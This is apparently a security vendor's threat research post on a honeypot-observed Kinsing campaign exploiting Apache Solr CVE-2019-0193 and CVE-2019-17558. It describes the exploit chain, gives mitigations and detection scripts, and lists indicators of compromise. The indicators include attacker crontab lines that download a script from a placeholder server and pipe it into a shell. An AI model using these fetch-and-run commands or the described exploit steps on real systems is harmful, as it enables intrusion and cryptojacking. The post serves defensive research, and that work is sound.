Akamai Security Intelligence
& Threat Research

Tales From The Pot: Solr powered Kinsing

Additional research and support provided by Chad Seaman.

Introduction

Akamai SIRT has been working on the development and deployment of custom multipurpose honeypots that attempt to mimic a wide array of services and devices. One of these honeypots shows the inner workings of an active exploitation campaign targeting Apache Solr (Solr). The campaign had a noticeable effect on targeting and exploitation attempts for two CVEs impacting Solr servers. This post will explore what these exploits target, how they work, and observations about this ongoing campaign.

What is Solr?

According to Apache, Solr is a "blazing-fast" open source enterprise search platform, which is built on Apache Lucene. It's scalable, fault tolerant, and offers distributed indexing, replication, and load-balancing. Many of the world's largest websites use it, including retailers, platform services, news organizations, and broadcasters.

Solr CVEs targeted

Akamai SIRT has observed several attempts at exploitation of Solr over the past several months. The most active campaign leverages two different CVEs issued for the project in 2019, impacting versions of the software released as recently as late 2019.

The first is CVE-2019-0193. It allows attackers to achieve remote code execution (RCE) on a server. This particular exploit impacts targets running Solr up to version 8.2.0 (released July 2019). The second is CVE-2019-17558. This vulnerability allows a crafted request to modify system configuration settings, enabling a scenario where an attacker can trigger RCE. This particular CVE affects targets running Solr versions 5.0.0 to 8.3.1 (released December 2019). This combination is quite effective: by using both CVEs, an attacker is able to cover a wider range of vulnerable versions and configurations of Solr.

Honeypot observations

In February of 2020, these CVE combinations were observed hitting our honeypot once every couple of days on average. Since September of 2020, we've seen a significant uptick in activity with exploitation attempts occurring regularly. In some cases, these attempts are happening multiple times per hour.

With proof-of-concept code for both of these CVEs being publicly available, it is fairly trivial to leverage them together in order to maximize the chances of successful exploitation. Some organizations are still using older vulnerable versions of Solr, leaving low-hanging fruit for attackers.

For both exploits to work, the attacker first needs to find out the names of the Solr cores. This requires some probing by the attackers, eventually leading up to actual RCE attempts. This means the exploitation attempts we've observed on our honeypot are always preceded by a simple GET request to /solr/admin/cores?wt=json, on port TCP/8983 or TCP/80. The response to this request is expected to contain the names of the Solr cores in JSON format.

 

Fig. 1 Probing request for cores' names 

When the request is made, our honeypot responds with a fake (but valid) payload, mimicking a real response. This is enough to trick the attacker's bot into proceeding to the next stage of the exploit.

CVE-2019-17558 usage

Immediately after the honeypot replies, it starts receiving a chain of incoming POST requests from the attacker. These POST requests contain the fake core name provided in the previous response. This chain of requests attempts to leverage both CVEs, one after the other; the requests are shown in sequential order in the images below.

The first few requests use the CVE-2019-17558 vulnerability, which affects Apache Solr versions 5.0.0 to 8.3.1. These versions are vulnerable to remote code execution through the VelocityResponseWriter.

 

Fig. 2 Request enabling VelocityResponseWriter 

This request toggles the Velocity Response Writer to true, enabling an attacker to use the Velocity Template parameter, which will make Remote Code Execution possible.

Following the configuration change request, we see our first use of the newly enabled RCE. The attacker attempts to delete the file located at /tmp/zzz. This is done in order to delete older versions of the malware from previous successful infections, and serves as a kind of update mechanism to the latest version of the malware.

 

Fig. 3 Removing old malware during fresh infection attempt using VelocityResponseWriter

The request that follows is another RCE, using curl to download the shell script 5.34.183.14/s.sh, saving it to disk as /tmp/zzz.

 

Fig. 4 Download the first phase of infection (s.sh)

The next request makes this newly created /tmp/zzz shell script executable, and sets the stage for phase 2 of the exploitation/infection process.

Fig. 5 Make the copy of /tmp/zzz (s.sh) stored on disk executable

Now with all the pieces in place for phase 1, we see the attempt to execute the shell script /tmp/zzz.

Fig. 6 Execute /tmp/zzz (s.sh) shell script

CVE-2019-0193 usage

The exploit chain leveraging CVE-2019-0193 uses the DataImportHandler to achieve RCE. While it requires slightly different tactics and payloads, the goal remains the same: fetch phase 1 of the infection, and get execution.

We can see another attempt to delete /tmp/zzz, but this time using the DataImportHandler and the accompanying exploitation payload.

Fig. 7 Removing old malware during fresh infection attempt using DataImportHandler

In the request that follows we can see an attempt to download the same malicious shell script using curl.

Fig. 8 Download the first phase of infection (s.sh)

The next request, once again, attempts to make the /tmp/zzz shell script executable.

Fig. 9 Make /tmp/zzz (s.sh) shell script executable
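The probe-then-exploit sequence described in the two sections above can be hunted for in web access logs by correlating the core-name probe with follow-up requests from the same source. This is an added example, not Akamai's honeypot code: the log format, the /config, /select and /dataimport handler paths (Solr's standard URL layout, assumed here because the figures are not reproduced), the function names and the five-minute window are assumptions, and the log lines are constructed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format). Addresses come from the
# documentation ranges and "core1" is a made-up core name.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2020:10:00:01 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 512
203.0.113.7 - - [12/Oct/2020:10:00:02 +0000] "POST /solr/core1/config HTTP/1.1" 200 120
203.0.113.7 - - [12/Oct/2020:10:00:03 +0000] "POST /solr/core1/select?wt=velocity HTTP/1.1" 200 80
203.0.113.7 - - [12/Oct/2020:10:00:05 +0000] "POST /solr/core1/dataimport HTTP/1.1" 200 80
198.51.100.9 - - [12/Oct/2020:10:01:00 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 512
198.51.100.23 - - [12/Oct/2020:11:00:00 +0000] "GET /solr/core1/select?q=shoes&wt=json HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3}'
)
# Assumed handler paths: /solr/<core>/config, /select and /dataimport.
HANDLER_RE = re.compile(r"/solr/[^/]+/(config|select|dataimport)")


def classify(method, target):
    """Map one request to a stage of the chain, or None for ordinary traffic."""
    url = urlsplit(target)
    if url.path == "/solr/admin/cores":
        return "probe"
    m = HANDLER_RE.fullmatch(url.path)
    if not m:
        return None
    handler = m.group(1)
    if handler == "config" and method == "POST":
        return "config-change"
    # /select is normal search traffic; only the Velocity writer is of interest.
    if handler == "select" and "velocity" in parse_qs(url.query).get("wt", []):
        return "velocity"
    if handler == "dataimport" and method == "POST":
        return "dataimport"
    return None


def find_chains(log_text, window=timedelta(minutes=5)):
    """Return {source_ip: [stages]} for sources that probed for core names and
    then hit a sensitive handler within `window`. Assumes chronological lines."""
    last_probe, findings = {}, {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stage = classify(m["method"], m["target"])
        if stage is None:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if stage == "probe":
            last_probe[m["ip"]] = ts
        elif m["ip"] in last_probe and ts - last_probe[m["ip"]] <= window:
            findings.setdefault(m["ip"], []).append(stage)
    return findings


if __name__ == "__main__":
    for ip, stages in find_chains(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

Access logs do not record POST bodies, so the Velocity stage is only visible to this check when the response writer is selected in the query string; the /config and /dataimport stages are matched on path and method alone.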

Malware

Kinsing is the family of malware the actors here are ultimately attempting to spread. Others have done a great job in covering the features and functionality of this family of malware. If you're interested in knowing more about the Kinsing malware family and its inner workings, the folks over at Red Canary did a wonderful write-up on this particular strain.

What to do

To mitigate these threats, the SIRT team suggests upgrading to the latest available version of Solr across your organization. Following general best practices means making sure to patch your systems regularly. 

Due to the malware authors regularly pushing out modified versions of their binary and script payloads, relying on hashes from IoC lists isn't a sure-fire method for detection. In our collection efforts, which ran for several months, we identified a dozen different shell script variants, and 375 binary variants. These variants don't appear functionally all that different, but it does appear the actors churn and randomly modify the data within the binaries to trip up fingerprinting and hash-based detection.

In this instance the attackers are uploading a cryptominer, worm, and RAT. This means monitoring your systems for abnormally high resource consumption and suspicious network activity could help identify machines that have already been compromised. They also establish persistence via crontab, target Docker images, and have additional scanning functionality via masscan. All of these components can be detected, and SIRT suggests reviewing a suspected system for these various traits as well.

Closing

The deployment of custom honeypots that cannot be easily fingerprinted can provide tremendous value from an intelligence gathering standpoint. In this case, our honeypot was able to show a substantial increase in exploitation attempts targeting Solr instances, and provided interesting insight into these trends and what they were currently being leveraged for.

Our custom honeypot wasn't just able to show a dramatic increase in popularity of CVE-2019-17558 and CVE-2019-0193. It also showed us an evolution in this campaign, as there are no previous public ties between Kinsing campaigns and CVE-2019-17558 as of this writing.

These findings are always interesting for the SIRT team from a research standpoint, but organizations should consider honeypots and canary systems to better understand threats targeting their organizations, especially if those systems emulate/simulate real infrastructure they're tasked with protecting.

 

Indications Of Compromise (IoC) 

Filesystem:

/tmp/zzz (hashes below)

kinsing (hashes below)

firewire (45a7ef83238f5244738bb5e7e3dd6299)

 

Crontab:

* * * * * wget -q -O - http://[SERVER]/s.sh | sh > /dev/null 2>&1

* * * * * curl http://[SERVER]/s.sh | sh > /dev/null 2>&1
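Because the payload hashes churn, the two crontab entries above are better matched by behaviour: a scheduled job that pipes a curl or wget download straight into a shell, whatever the server or script name. The following is an added example, not part of the original post; the function names are hypothetical and the sample crontab is constructed, with a documentation address standing in for [SERVER].

```python
import re

# Constructed crontab text. Lines 2 and 3 follow the two IoC patterns above,
# with 192.0.2.10 (documentation range) in place of [SERVER].
SAMPLE_CRONTAB = """\
# m h dom mon dow command
* * * * * wget -q -O - http://192.0.2.10/s.sh | sh > /dev/null 2>&1
* * * * * curl http://192.0.2.10/s.sh | sh > /dev/null 2>&1
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsS https://status.example.com/ping > /dev/null
"""

FETCHERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "zsh"}
URL_RE = re.compile(r"https?://[^\s|;'\"]+")


def basename(word):
    return word.rsplit("/", 1)[-1]


def download_and_execute(command):
    """Return the fetched URL if `command` pipes a curl/wget download directly
    into a shell, else None."""
    stages = [s.split() for s in command.split("|")]
    for left, right in zip(stages, stages[1:]):
        if not left or not right:
            continue  # empty stage, e.g. from "||", which is not a pipe
        # Look at the first two words so the user column of /etc/crontab-style
        # files ("root curl ...") does not hide the fetcher.
        fetches = any(basename(w) in FETCHERS for w in left[:2])
        url = URL_RE.search(" ".join(left))
        if fetches and url and basename(right[0]) in SHELLS:
            return url.group(0)
    return None


def scan_crontab(text):
    """Return one finding per crontab entry that downloads and executes."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):  # @reboot, @hourly, ...
            parts = line.split(None, 1)
            if len(parts) < 2:
                continue
            schedule, command = [parts[0]], parts[1]
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # environment assignment or malformed entry
            schedule, command = fields[:5], fields[5]
        url = download_and_execute(command)
        if url:
            findings.append({"line": lineno, "url": url,
                             "every_minute": schedule == ["*"] * 5})
    return findings


if __name__ == "__main__":
    for finding in scan_crontab(SAMPLE_CRONTAB):
        print(finding)
```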

 

Infrastructure:


 

Scanning/infecting systems

95.214.11.231

95.215.108.217

212.8.247.179

 

Targeting:

Malware MD5 Hashes:

s.sh (/tmp/zzz):


 

kinsing binary:
